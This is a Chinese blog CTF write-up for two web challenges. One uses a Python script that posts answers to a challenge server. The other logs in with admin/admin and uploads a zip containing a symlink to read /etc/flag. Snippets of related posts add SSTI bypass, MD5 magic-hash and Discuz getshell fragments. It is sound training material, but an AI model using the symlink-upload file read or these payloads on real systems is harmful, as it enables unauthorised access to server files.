2020web安全测试——wp

最新推荐文章于 2022-10-09 15:57:33 发布
最新推荐文章于 2022-10-09 15:57:33 发布
阅读量539 收藏 1
点赞数 2
分类专栏: Web安全-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/109961063
版权

文章目录

就这么直接

在这里插入图片描述
查看一下源码会发现一个hint.php,访问:

<?php
$key = "********";
srand(time());

$a = rand(0,100);
$b = rand(0,100);
$c = rand(0,100);
$d = rand(0,100);
$e = rand(0,100);

$result = ((($a - $b)/$c)+$d) * $e;
$result = md5($key.$result.$key);
echo $result;
?>

利用python脚本,

import requests
import re
def get():
        url='http://183.129.189.60:10007/flag.php'
        data={
		'answer': 'c6b63823cea1cd7e136e19b1f8c52258'
	}
        r=requests.post(url,data=data)
        f = open("web2.txt", 'w')
        f.write(r.text)
        f.close()
        print("get success!")
def getTitle(booktext):
        return re.search( r'<!--(.+?)-->', booktext, re.M|re.I).group(1)
def sent():
        f = open("web2.txt", 'r')
        message = f.read()
        f.close()
        message =  getTitle(message)
        print(message)
        url='http://183.129.189.60:10007/flag.php'
        data={
		'answer': message
	}
        r=requests.post(url,data=data)
        print(r.text)
        print("post success!")
if __name__ == '__main__':
        get()
        sent()

这个脚本是借鉴其他师傅的,直接跑出flag。

getflag

弱口令/软连接:
在这里插入图片描述
试了试万能密码,发现不行,最后发现弱口令可以,username:admin,password:admin;登录之后会出现一个上传文件的界面
提示是上传一个压缩包,然后给出了flag路径:/etc/flag

这里就需要用到软连接:

ln -s 源文件 目标文件
当我们需要在不同的目录,用到相同的文件时,我们不需要在每一个需要的目录下都放一个必须相同的文件,我们只要在某个固定的目录,放上该文件,然后在其它的 目录下用ln命令链接(link)它就可以,不必重复的占用磁盘空间。

利用软连接将flag进行路径进行索引,将它压缩
ln -s /etc/flag xx
zip -y 1.zip xx
上传1.zip 就得到了flag。

Stray.io
关注
专栏目录
2023福建省“信息安全管理与评估“——Web综合渗透测试(高职组)
Aluxian_的博客
04-09 716
在A集团的网络中存在几台服务器,各服务器存在着不同业务服务。在网络中存在着一定网络安全隐患,请利用你所掌握的渗透测试技术,通过信息收集、漏洞挖掘等渗透测试技术,完成指定项目的渗透测试,在测试中获取flag值。 本模块所使用到的渗透测试技术包含但不限于如下技术领域: • 信息收集 • 逆向文件分析 • 二进制漏洞利用 • 应用服务漏洞利用 • 操作系统漏洞利用 • 杂项与密码学分析 • 系统文件分析
CTFshow——WPWEB[1~5])
hahaha233330的博客
10-29 704
1、web签到题 F12 2、web2
第38节 WEB容器之IIS二(大飞哥网络安全初学者课程).mp4
07-22
大飞哥网络安全第一阶段课程,适合0基础/初学者体系化学习,也适合老手巩固基础观看,希望大家在学习过程中理解技术原理,为更深层次的防御攻击等学习打好基础。最好别用mac,好多工具不兼容。
2020软测Web安全测试-easy_flask3-WP
qq_42560798的博客
11-22 287
过滤{{}} > 使用{%%}报错> 使用{%25%25} 过滤 ’ 和 " > 通过{%25set mystr=dict(xxx=1).keys()|reverse|first %25}来使得变量mystr=“xxx” 题目当中用到的有:在下面的pyload当中要用到这些变量来构造字符串(通过 __cla和ss__来绕过) {%25set cla=dict(cla=1).keys()|reverse|first %25} {%25set ss=dict(ss=1).keys()|reve
[WP/WEB安全/命令注入]由[网鼎杯 2020 朱雀组]Nmap-总结在线工具注入
車鈊的博客
06-06 466
在线工具注入总结 此道可理解为一种命令注入,凡是依托eval或者提交语句完成的命令执行,如果应用对用户可控的语句信任度过高的话,都会产生注入,这可以作为一些渗透的解题思路。 [网鼎杯2020朱雀组]NMAP 源码 做题中读取到的源码 <?php require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans dis
web安全测试2019
qq_40872999的博客
10-09 494
2019软件测试大赛web安全测试练习题练习赛一共13题,目前只做了10到1、爱い窒息、痛 练习赛一共13题,目前只做了10到 1、爱い窒息、痛 首先进入靶机http://114.55.36.69:8020 如图: 点击upload如图 打开dama.xxxx发现源代码,在主机上安装好php环境,并用phpstore创建一个空项目,然后把dama.xxx复制到里面,然后在关键地方写输出语句,观察结...
Web安全测试解决方案
巅峰测试
09-29 5465
介绍常见的Web安全风险,Web安全测试方法、测试基本理论和测试过程中的工具引入等!  
攻防世界WEB进阶——Cat wp
weixin_42499640的博客
07-31 1038
首先打开题目是个发现是个云端测试 提示输入域名 先输个baidu.com 没反应 输入百度的ip 220.181.38.148 反馈了 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transmitted, 0 receive...
CTFShow 2022——新手杯wp WEB题目
qq_60878323的博客
10-09 1242
小艾大佬的投稿支持 web AK了
web安全攻防渗透测试实战指南
weixin_67846882的博客
04-07 5042
1.Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
php 字符串m5加密解密_php结合md5的加密解密算法实例
weixin_39548438的博客
03-09 258
本文实例讲述了php结合md5的加密解密算法。分享给大家供大家参考,具体如下:/** Created on 2016-9-30**/function encrypt($data, $key){$key = md5($key);$x = 0;$len = strlen($data);$l = strlen($key);for ($i = 0; $i < $len; $i++){if ($x =...
Dz7.2 从获取uc key到getshell
weixin_30256901的博客
01-23 365
0x01下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑–表能跑的出 列就GG了 然后没辙–晚上跑各大论坛逛了遍果然大神多 就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵-。- 0x02获取uc key exp: faq.php?action=grouppermission&gids[99]='&amp...
MD5加 秘钥 (数据加解密类 / 直接复制使用)
qq_37259112的博客
10-11 5505
import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec; public class AesUtil {     private static fina...
$key 的用法
weixin_30470857的博客
05-22 565
<?php $attr=array("a","b","c","d"); //$key,默认是主键值,$value,默认元素值 while(list($key,$value)=each($attr)) //将主键值,赋值给$key,将元素值,赋值给$value { echo $key."=>".$value."<br>"; } ...
菜鸟浅谈——web安全测试
热门推荐
u010559128的博客
02-27 5万+
本文仅为小白了解安全测试提供帮助 一:安全测试注意事项 1)要注意白帽子与黑客之间的区别 2)在挖漏洞挣外快时,注意不要使用安全扫描或暴力破解软件对上线网站进行扫描或攻击。 不要对上线网站造成破坏,不要去获取网站的数据库信息等。否则等待的不是money,而是牢狱啦~~ 二:web介绍 1)world wide web 万维网,也被叫做www(3w),非常普遍的互联网应用,每天都有数以亿万...
UNCTF2020 | Web Wp
Lemon's blog
11-24 2675
Misc baba_is_you 工具打开文件,访问一下就会看到flag了
web安全测试方法
胡迪_tester的博客
09-24 452
web安全测试方法 https://blog.csdn.net/guozy_u/article/details/84762081
CTF中常见的PHP函数漏洞
渗透、攻防、CTF、编程
07-04 2581
1.弱类型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a...
诺基亚WP8手机硬件测试全攻略
该文档是诺基亚内部使用的WP8系统S30+手机硬件测试指导,涵盖了多种关键硬件组件的测试方法,旨在确保设备在出厂前的功能完整性。 诺基亚WP8手机测试软件指导主要涉及以下几个方面: 1. **自测 (Selftest)**:这是...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值